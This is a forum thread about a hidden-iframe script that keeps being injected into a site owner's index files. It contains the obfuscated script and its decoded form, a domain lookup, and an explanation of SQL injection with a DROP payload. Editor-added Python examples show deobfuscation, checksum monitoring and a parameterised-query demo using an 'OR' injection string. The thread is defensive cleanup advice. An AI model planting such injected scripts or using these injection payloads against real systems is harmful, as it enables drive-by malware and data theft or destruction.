Paine

Has anyone seen this script before?

10 posts in this topic

Maybe this is a stupid question, maybe this is the wrong place for this, or maybe somebody knows and can help me out.

<script>wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute('width','1');ip.setAttribute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);</script>

Ok, so being a noob, I'll just lay out what's going on and hope I don't sound any stupider than I am. This script keeps adding itself to all of my index and start PHP and HTML scripts. I have no idea how this is happening or how to make it stop. My guess was that it was just a redirect that was being injected somehow into the scripts. The odd thing is that it's very inconsistent as to when it's happening: at one point, after I removed the scripts and replaced them with clean ones, it happened after 20 minutes. Another time it took as long as 23 hours. It hasn't affected any other files than the index and start files, so it's being selective; I just don't know why it keeps happening. If you can help me out, I'd appreciate it, or maybe I've just helped you out by giving you a great new script that will help you take over the world. Either way.

-P



<script>
var ip=document.createElement('iframe');
ip.setAttribute('width','1');
ip.setAttribute('height','1');
ip.frameBorder=0;ip.setAttribute('src','hxxp://zirycatum.com/k985ytv.htm');
document.body.appendChild(ip);
</script>

Looks like someone wants this on your page. I haven't checked it out, but I turned http into hxxp 'cause I don't think this is a friendly link...

Edited by serrath
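As an added example (not code from this thread or from serrath), here is a small Python deobfuscator that recovers by machine what was worked out by hand above: it evaluates only the string-literal and .concat() assignments in the script, never any of the DOM calls, and then reports which element the script would have created and with which attributes. The input is the script from the first post, copied verbatim; defang() follows the thread's hxxp convention so the resolved address is never printed as a live link.

```python
import re

# The injected script exactly as posted in the first post of the thread.
INJECTED = ("<script>wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';"
            "px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';"
            "cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);"
            "db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);"
            "var ip=document.createElement(se);ip.setAttribute('width','1');"
            "ip.setAttribute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);"
            "document.body.appendChild(ip);</script>")

LITERAL = re.compile(r"^(\w+)='([^']*)'$")                  # name='chunk'
CONCAT = re.compile(r"^(\w+)=(\w+)\.concat\(([\w,]+)\)$")   # name=a.concat(b,c,...)


def resolve_strings(script):
    """Statically evaluate the string assignments; nothing from the script is executed."""
    body = re.sub(r"</?script>", "", script)
    env = {}
    for stmt in body.split(";"):
        stmt = stmt.strip()
        m = LITERAL.match(stmt)
        if m:
            env[m.group(1)] = m.group(2)
            continue
        m = CONCAT.match(stmt)
        if m:
            parts = [m.group(2)] + m.group(3).split(",")
            env[m.group(1)] = "".join(env[p] for p in parts)
    return env


def summarise(script):
    """Substitute the resolved names into the DOM calls to read the script's intent."""
    env = resolve_strings(script)
    body = re.sub(r"</?script>", "", script)
    elem = re.search(r"createElement\((\w+)\)", body).group(1)
    attrs = re.findall(r"setAttribute\((\w+|'[^']*'),(\w+|'[^']*')\)", body)

    def val(tok):
        return tok.strip("'") if tok.startswith("'") else env.get(tok, tok)

    return {"element": val(elem), "attributes": {val(a): val(b) for a, b in attrs}}


def defang(url):
    """Render a recovered URL the way the thread does (http -> hxxp)."""
    return url.replace("http", "hxxp", 1)


if __name__ == "__main__":
    info = summarise(INJECTED)
    print("element:", info["element"])
    for name, value in info["attributes"].items():
        print(f"  {name} = {defang(value) if name == 'src' else value}")
```

The parser deliberately knows only the two statement shapes this sample uses; a different packer would need its own rules, but the principle of resolving string-building statically rather than running the script in a browser carries over.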


<script>
var ip=document.createElement('iframe');
ip.setAttribute('width','1');
ip.setAttribute('height','1');
ip.frameBorder=0;ip.setAttribute('src','hxxp://zirycatum.com/k985ytv.htm');
document.body.appendChild(ip);
</script>

Looks like someone wants this on your page. I haven't checked it out, but I turned http into hxxp 'cause I don't think this is a friendly link...

When going to zirycatum.com it gives me:

403 Forbidden

nginx

DNS records:

Site: http://zirycatum.com
Last reboot: unknown
Domain: zirycatum.com
Netblock owner: Spenelli Media Inc.
IP address: 178.17.163.92
Site rank: unknown
Country: MD
Nameserver: ns1.zirycatum.com
Date first seen: unknown
DNS admin: hostmaster@zirycatum.com
Domain Registrar: unknown
Reverse DNS: 178-17-163-92.static-host.net
Organisation: unknown
Nameserver Organisation: unknown

The actual link has no data. It's just a blank page. Most likely formerly hosting malware.


Wow, thanks guys. I was kind of thinking that's what it was, but I've never seen anything like that before so I couldn't make heads or tails of it.

Again thanks

-P


Nice bit of obfuscation.

When you say "adds itself to my index page" do you mean if you pull up the index file in a text editor the above code appears in it? If so, your server is backdoored somehow by a process that has write permissions to those files, and until you fix the hole it's just going to keep popping back to insert its edits.

If you say what software stack (e.g. LAMP, SAMP etc.) you are using and what version (but don't reveal your URL, or some may actively help you notice the problem by p0wnage; this is after all a hacker forum and there are curious souls here regardless), someone might point out which part of the software stack you are running is the likely culprit...

Or someone could have just broken into one of the network daemons the old-school way and rootkitted it...


Brave soul.

I opened the page in a sandboxed web browser... safe enough, especially since the computer isn't mine ;P


wget with the UA string set to the most exploitable version of IE you can think of is pretty useful too. It's interesting switching the UA round versions and between IE and Firefox and getting different payloads too.


Nice bit of obfuscation.

When you say "adds itself to my index page" do you mean if you pull up the index file in a text editor the above code appears in it? If so, your server is backdoored somehow by a process that has write permissions to those files, and until you fix the hole it's just going to keep popping back to insert its edits.

If you say what software stack (e.g. LAMP, SAMP etc.) you are using and what version (but don't reveal your URL, or some may actively help you notice the problem by p0wnage; this is after all a hacker forum and there are curious souls here regardless), someone might point out which part of the software stack you are running is the likely culprit...

Or someone could have just broken into one of the network daemons the old-school way and rootkitted it...

Yes, sorry, I guess I forgot to put that in. When I open the file in a text editor I found the script added in at the bottom of the page. My guess was it was an injection of some kind or another, although I'm not really sure I understand how those work lol. I guess we're running LAMP, and the only version I can remember is PHP 5, on CentOS with WHM on there too, if that helps. After basically just messing with a few things (this is how I do everything, I never actually know what I'm doing till at least the third time, yeah I'm a noob) I found that the perms on the PHP and HTML left them open to user modification. I turned that off and it stopped happening.


Warning, Caution, Mayday! Don't put anything you value any degree of confidentiality with on that server as is.

While that's generally a good rule for any internet-facing webserver if possible, someone has managed to get filesystem-level access to that web server and you have no way of knowing what else they changed when they had that.

They could have left other processes and backdoors on the system sleeping, and while you've closed the automated spambot-injecting one, they could be popping back to see if there's any information they could harvest manually that could generate money for them, or be using it as an attack launchpad at some level undetectable to you and your current toolkits. There's a whole genre of software designed to be installed post-hacking by the hackers to enable them to keep a level of control over it. Google rootkit. Or invisible rootkit. Or read round here.

Seriously, treat it as still completely compromised, because as far as you know it still is. If something gets broken into, the content you generate should be backed up and the whole server nuked and reinstalled, then patched against whatever you find before it goes back onto the internet. If it's a virtual server, they can probably reimage in minutes, and you can get exclusive access to make your config changes via an alternative IP. Depends on how receptive the hosting company is. Two of mine are great, and the third doesn't give a s*** and won't assist even with security stuff they have caused where the fix would be to their benefit. Maybe that's why they are a 1/4 the price, so I just use that box for low-importance hosting of bulk volume stuff.

I run tripwire on the servers I care about a lot, amongst various other monitoring tools, and I can check what's been altered if they get attacked because it takes a cryptographic sum of the entire machine less a few directories which change often and don't hold binaries or config. And even if I ran the checksum check post successful intrusion, as identified by other monitoring tools on there, I'd still pull that server from service and nuke it from orbit.

For the SQL injection, basically a simplified summary is: typically the webserver takes in POST data from a form somehow, say a search box or username etc. And it doesn't check for unsafe chars in the input or overlong data lengths, or the source of the POST (some mad fools do their sanitization in JavaScript client side, in which case it's trivial to just make a new page up with their parameter names in and bypass every control or safety measure they put in).

The server hands this data off to the SQL server, which starts parsing through the data. So let's give a simple example. Some of this syntax might be a bit wobbly because I'm writing it off the top of my head, but it outlines the general act.

A username box is entered with "'; DROP database mysql;", and posted to your webserver. The webserver hands it to MySQL, which comes along and parses the name contents, which ends up as a DROP DATABASE command once the first ` closes the original query. If your webserver is running with full priv over your MySQL database, it could result in instant complete deletion. Of course most attackers don't want to make a noise, so instead it's more common to do a select * and attempt to extract information stored in there with the same method, or inject new users in to connect with etc. I've seen this work against commercial products, so don't feel too ashamed if you find it too. Most of the open source forums etc. are fairly well tested by now, but they do have the occasional vuln identified, so it's always good practice to stay with as new a version as you can with them, ditto for the rest of your software stack if you have any control over it.

Not many people would blow a 0 day on a forum about donkey saving or something, its mostly known exploits months or years old for that level.

Bit of a learning curve to take all the above in quickly and understand it, but you'll get there if you want to.
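Added example, not part of the thread: a Python sketch of the two checks this post and Paine's earlier permissions fix point at, a tripwire-style SHA-256 baseline of the web root (so a re-injected index file shows up as "modified") and a scan for files that are world-writable. The web root it walks is a constructed temporary directory holding an index.php and a start.html; the SKIP_DIRS names and the 0o666 mode on start.html are assumptions standing in for the "open to user modification" mistake.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path

# Directories that churn and hold no code or config (assumed names, as tripwire's
# "less a few directories" exclusion in the post).
SKIP_DIRS = {"logs", "tmp", "cache"}


def file_digest(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map relative path -> (sha256, permission bits) for every regular file under root."""
    root = Path(root)
    snap = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            p = Path(dirpath) / name
            st = p.lstat()
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets etc. are not hashed
            snap[str(p.relative_to(root))] = (file_digest(p), stat.S_IMODE(st.st_mode))
    return snap


def diff_snapshots(before, after):
    """Files that appeared, vanished, or whose content hash changed since the baseline."""
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    modified = sorted(k for k in before.keys() & after.keys() if before[k][0] != after[k][0])
    return {"added": added, "removed": removed, "modified": modified}


def world_writable(snap):
    """Files any local user could edit, which is how the thread's injection got in."""
    return sorted(k for k, (_, mode) in snap.items() if mode & stat.S_IWOTH)


def demo():
    """Build a throwaway web root, baseline it, simulate the injection, and report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (root / "start.html").write_text("<html><body>start</body></html>\n")
        os.chmod(root / "index.php", 0o644)
        os.chmod(root / "start.html", 0o666)  # the 'open to user modification' mistake
        baseline = snapshot(root)

        # Simulated injection: something appends a script tag to index.php.
        with open(root / "index.php", "a") as fh:
            fh.write("<script>/* constructed injected tag */</script>\n")

        current = snapshot(root)
        report = diff_snapshots(baseline, current)
        report["world_writable"] = world_writable(current)
        return report


if __name__ == "__main__":
    print(demo())
```

In real use the baseline would be taken right after a clean install and stored off the box (a baseline the intruder can rewrite proves nothing), which is also why the post still recommends reinstalling rather than trusting a diff taken after the fact.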
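Added example, not from the thread, showing the mechanism described in the SQL injection paragraphs above in Python with an in-memory sqlite3 table: the same form value handled by string concatenation versus a parameterised query. The users table and its two rows are constructed; the stacked_rejected check records that sqlite3's execute() refuses a second statement, so the post's DROP payload is rejected by this particular driver even though the concatenation itself is still unsafe and still lets a quote in the input rewrite the WHERE clause.

```python
import sqlite3


def make_db():
    """Constructed sample: a users table standing in for the site's real database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "s3cret"), ("bob", "hunter2")])
    return con


def lookup_vulnerable(con, name):
    # The form value is pasted straight into the SQL text, so data becomes code:
    # a quote in the input closes the literal and the rest is parsed as SQL.
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in con.execute(sql)]


def lookup_parameterised(con, name):
    # The driver sends the value separately from the statement; quotes inside it
    # are just characters, so the input can only ever be compared, never parsed.
    rows = con.execute("SELECT name FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]


def stacked_rejected(con):
    """sqlite3 refuses 'statement; statement' in one execute(), so the post's
    DROP payload fails here; drivers that allow stacked queries would run it."""
    try:
        lookup_vulnerable(con, "'; DROP TABLE users; --")
    except (sqlite3.Warning, sqlite3.Error):
        return True
    return False


def demo():
    con = make_db()
    hostile = "x' OR 'a'='a"   # same trick as the post's example, aimed at a SELECT
    return {
        "vulnerable": lookup_vulnerable(con, hostile),        # every row comes back
        "parameterised": lookup_parameterised(con, hostile),  # no user has that name
        "stacked_statement_rejected": stacked_rejected(con),
    }


if __name__ == "__main__":
    print(demo())
```

The point the post makes about "select *" is the vulnerable line: the hostile value never drops anything, it just turns a lookup for one user into a lookup for all of them, which is the quiet data-extraction case the post says is more common than deletion.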

